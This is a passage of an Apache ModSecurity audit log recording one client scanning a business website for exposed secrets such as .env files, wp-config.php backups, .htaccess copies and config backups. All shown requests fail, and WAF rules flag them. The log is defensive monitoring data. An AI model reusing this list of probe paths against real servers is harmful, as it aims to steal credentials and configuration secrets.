aFBq2h6Azi2u_ik2Q3KpMwAAAAY 185.177.72.201 43338 127.0.0.1 7080 --34372a6c-B-- GET /wp-config.php.swo HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --34372a6c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --34372a6c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.swo"] [unique_id "aFBq2h6Azi2u_ik2Q3KpMwAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.swo' not found or unable to stat Stopwatch: 1750100698597633 3519 (- - -) Stopwatch2: 1750100698597633 3519; combined=2057, p1=459, p2=1532, p3=0, p4=0, p5=66, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34372a6c-Z-- --026cbd47-A-- [17/Jun/2025:00:34:59.268753 +0530] aFBq25lL5_2Zd8wUdfLJJwAAAAg 185.177.72.201 43396 127.0.0.1 7080 --026cbd47-B-- GET /core/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --026cbd47-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --026cbd47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/core/.env"] [unique_id "aFBq25lL5_2Zd8wUdfLJJwAAAAg"] Stopwatch: 1750100699265205 3615 (- - -) Stopwatch2: 1750100699265205 3615; combined=2192, p1=381, p2=1749, p3=0, p4=0, p5=62, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --026cbd47-Z-- --48a8ed79-A-- [17/Jun/2025:00:34:59.379662 +0530] aFBq2x6Azi2u_ik2Q3KpNQAAAAY 185.177.72.201 45938 127.0.0.1 7080 --48a8ed79-B-- GET /composer.json.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --48a8ed79-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --48a8ed79-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.old"] [unique_id "aFBq2x6Azi2u_ik2Q3KpNQAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.old"] [unique_id "aFBq2x6Azi2u_ik2Q3KpNQAAAAY"] Stopwatch: 1750100699376240 3477 (- - -) Stopwatch2: 1750100699376240 3477; combined=2101, p1=399, p2=1612, p3=0, p4=0, p5=90, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --48a8ed79-Z-- --0d250947-A-- [17/Jun/2025:00:34:59.601801 +0530] aFBq203CmevS3xeTzmojRAAAAAQ 185.177.72.201 45962 127.0.0.1 7080 --0d250947-B-- GET /wp-config.php.zip HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0d250947-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0d250947-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.zip"] [unique_id "aFBq203CmevS3xeTzmojRAAAAAQ"] Stopwatch: 1750100699598439 3425 (- - -) Stopwatch2: 1750100699598439 3425; combined=2058, p1=442, p2=1563, p3=0, p4=0, p5=53, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d250947-Z-- --1c0e012d-A-- [17/Jun/2025:00:35:00.970477 +0530] aFBq3JlL5_2Zd8wUdfLJKwAAAAg 185.177.72.201 46128 127.0.0.1 7080 --1c0e012d-B-- GET /.htaccess~ HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1c0e012d-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --1c0e012d-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess~"] [unique_id "aFBq3JlL5_2Zd8wUdfLJKwAAAAg"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess~ Stopwatch: 1750100700969501 1030 (- - -) Stopwatch2: 1750100700969501 1030; combined=495, p1=404, p2=0, p3=0, p4=0, p5=91, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c0e012d-Z-- --cf48ba63-A-- [17/Jun/2025:00:35:01.081958 +0530] aFBq3R6Azi2u_ik2Q3KpOQAAAAY 185.177.72.201 46136 127.0.0.1 7080 --cf48ba63-B-- GET /:8888/tmp/fehler.log HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cf48ba63-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --cf48ba63-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/:8888/tmp/fehler.log"] [unique_id "aFBq3R6Azi2u_ik2Q3KpOQAAAAY"] Stopwatch: 1750100701078451 3564 (- - -) Stopwatch2: 1750100701078451 3564; combined=2159, p1=376, p2=1717, p3=0, p4=0, p5=66, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf48ba63-Z-- --acc0c538-A-- [17/Jun/2025:00:35:01.193748 +0530] aFBq3X3hoSwVUy254pH0VQAAACQ 185.177.72.201 46138 127.0.0.1 7080 --acc0c538-B-- GET /admin.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --acc0c538-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --acc0c538-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/admin.php.bak"] [unique_id "aFBq3X3hoSwVUy254pH0VQAAACQ"] Stopwatch: 1750100701189378 4451 (- - -) Stopwatch2: 1750100701189378 4451; combined=2689, p1=489, p2=2117, p3=0, p4=0, p5=83, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acc0c538-Z-- --05d6064d-A-- [17/Jun/2025:00:35:01.527908 +0530] aFBq3R6Azi2u_ik2Q3KpOgAAAAY 185.177.72.201 46172 127.0.0.1 7080 --05d6064d-B-- GET /.env.orig HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --05d6064d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --05d6064d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.orig"] [unique_id "aFBq3R6Azi2u_ik2Q3KpOgAAAAY"] Stopwatch: 1750100701524706 3257 (- - -) Stopwatch2: 1750100701524706 3257; combined=1917, p1=384, p2=1475, p3=0, p4=0, p5=58, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05d6064d-Z-- --2b8b4c6c-A-- [17/Jun/2025:00:35:01.639712 +0530] aFBq3ZVkCcfT-Z8NQYyU9gAAAAc 185.177.72.201 46184 127.0.0.1 7080 --2b8b4c6c-B-- GET /composer.json.orig HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2b8b4c6c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2b8b4c6c-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.orig"] [unique_id "aFBq3ZVkCcfT-Z8NQYyU9gAAAAc"] Stopwatch: 1750100701635817 4002 (- - -) Stopwatch2: 1750100701635817 4002; combined=2392, p1=482, p2=1809, p3=0, p4=0, p5=101, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b8b4c6c-Z-- --b76aeb50-A-- [17/Jun/2025:00:35:01.752242 +0530] aFBq3Sid3pHxA3RhGpzqUgAAAAk 185.177.72.201 46202 127.0.0.1 7080 --b76aeb50-B-- GET /config.ini HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b76aeb50-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b76aeb50-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.ini"] [unique_id "aFBq3Sid3pHxA3RhGpzqUgAAAAk"] Stopwatch: 1750100701748848 3451 (- - -) Stopwatch2: 1750100701748848 3451; combined=1980, p1=406, p2=1511, p3=0, p4=0, p5=62, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b76aeb50-Z-- --6dd4ee32-A-- [17/Jun/2025:00:35:02.086401 +0530] aFBq3k3CmevS3xeTzmojSgAAAAQ 185.177.72.201 46250 127.0.0.1 7080 --6dd4ee32-B-- GET /.env.original HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6dd4ee32-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6dd4ee32-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.original"] [unique_id "aFBq3k3CmevS3xeTzmojSgAAAAQ"] Stopwatch: 1750100702083281 3191 (- - -) Stopwatch2: 1750100702083281 3191; combined=1949, p1=367, p2=1505, p3=0, p4=0, p5=77, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6dd4ee32-Z-- --761b9420-A-- [17/Jun/2025:00:35:02.861541 +0530] aFBq3k3CmevS3xeTzmojTAAAAAQ 185.177.72.201 46342 127.0.0.1 7080 --761b9420-B-- GET /.htaccess.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --761b9420-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --761b9420-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.old"] [unique_id "aFBq3k3CmevS3xeTzmojTAAAAAQ"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.old Stopwatch: 1750100702860585 1011 (- - -) Stopwatch2: 1750100702860585 1011; combined=483, p1=413, p2=0, p3=0, p4=0, p5=69, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --761b9420-Z-- --2d714804-A-- [17/Jun/2025:00:35:03.083491 +0530] aFBq3x6Azi2u_ik2Q3KpPgAAAAY 185.177.72.201 46370 127.0.0.1 7080 --2d714804-B-- GET /config.php.inc HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2d714804-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2d714804-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.php.inc"] [unique_id "aFBq3x6Azi2u_ik2Q3KpPgAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/config.php.inc' not found or unable to stat Stopwatch: 1750100703080021 3528 (- - -) Stopwatch2: 1750100703080021 3528; combined=2140, p1=413, p2=1657, p3=0, p4=0, p5=70, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d714804-Z-- --b22f9130-A-- [17/Jun/2025:00:35:03.640647 +0530] aFBq3yid3pHxA3RhGpzqVwAAAAk 185.177.72.201 46426 127.0.0.1 7080 --b22f9130-B-- GET /settings.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b22f9130-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b22f9130-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/settings.php.bak"] [unique_id "aFBq3yid3pHxA3RhGpzqVwAAAAk"] Stopwatch: 1750100703635926 4801 (- - -) Stopwatch2: 1750100703635926 4801; combined=2964, p1=554, p2=2325, p3=0, p4=0, p5=84, sr=187, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b22f9130-Z-- --b43dd251-A-- [17/Jun/2025:00:35:04.194925 +0530] aFBq4H8PxMRZ7s11niQKAwAAAAI 185.177.72.201 46460 127.0.0.1 7080 --b43dd251-B-- GET /src/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b43dd251-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b43dd251-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/src/.env"] [unique_id "aFBq4H8PxMRZ7s11niQKAwAAAAI"] Stopwatch: 1750100704192014 2965 (- - -) Stopwatch2: 1750100704192014 2965; combined=1771, p1=392, p2=1319, p3=0, p4=0, p5=60, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b43dd251-Z-- --ecc8a844-A-- [17/Jun/2025:00:35:04.973376 +0530] aFBq4H8PxMRZ7s11niQKBQAAAAI 185.177.72.201 46540 127.0.0.1 7080 --ecc8a844-B-- GET /wp-config.php.orig 